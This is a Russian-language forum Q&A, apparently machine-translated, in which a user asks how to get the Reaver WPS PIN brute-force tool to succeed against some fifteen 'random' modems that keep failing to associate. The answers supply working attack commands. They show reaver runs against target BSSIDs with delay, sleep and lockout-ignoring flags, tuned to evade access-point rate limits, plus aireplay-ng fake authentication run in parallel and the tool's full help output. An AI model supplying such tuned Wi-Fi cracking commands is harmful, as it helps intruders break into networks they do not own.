1

Я использую последнюю версию Debian с amd64 на Dell Inspiron 1564 с адаптером Broadcom pci BCM4312, входящим в семейство B43xx.

я также использую последнюю версию программы Reaver, теперь я знаю, что этот адаптер у меня не совместим с Linux, так как его не удалось установить с диска, он попросил у меня какой-нибудь файл fw, но в любом случае я запустил его, я могу выходить в Интернет ,

на мой вопрос я смог взломать мои случайные модемы все с помощью wps. так как я получил этот компьютер НЕТ.!

что происходит, когда он начинает ассоциировать, BAM, затем он начинает пробовать BAM, а затем примерно через 1% - 4% он начинает давать FAILED TO ASSOCIATE каждую минуту, он может делать это всю ночь

Я пробовал около 15 различных модемов и одну и ту же историю

Есть ли хитрость, чтобы обойти это, может быть, добавить больше команд, чтобы сделать что-то, что почти гарантирует успех?

Спасибо

2 ответа2

3

Ревер - деликатный зверь, которому для работы требуется нежная заботливая забота. Скорее всего, происходит то, что точка доступа достигает максимального количества попыток, выделенных за период времени.

Вам нужно будет замедлить вашу атаку.

Если вы reaver -h , вы увидите список всех доступных опций.

Вам нужно будет поэкспериментировать с этими вариантами.

попробуйте использовать

-a (auto detect beset options)  
-d (give a long delay between requests)  
-r (sleep after so many attempts)  
-vv (very verbose, will show everything that is going on. You can then google any error messages you see)  
-x (time to sleep after 10 failures)  

Мой стандартный конфиг. Если это не работает, я начинаю добавлять флаги, такие как -x или -r.

reaver -i mono0 -c 1 -b <someMacAddress> -vv -a 

Страница справки

root@kali:/etc/apt# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]
2

Просто делать:

reaver with -N option

Сначала ничего не делайте, используя опцию -a . Также попробуйте пообщаться с Aireplay.

Так что просто сделайте это:

reaver -i wlan0 -b 00:12:34:56:78 -vv -N -S -A

Одновременно делайте:

aireplay-ng -1 5 -a 00:12:34:56:78 wlan0 

Если у вас возникли проблемы с связью с AP, не пробуйте Aireplay-ng с -1 30 или более цифрами.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .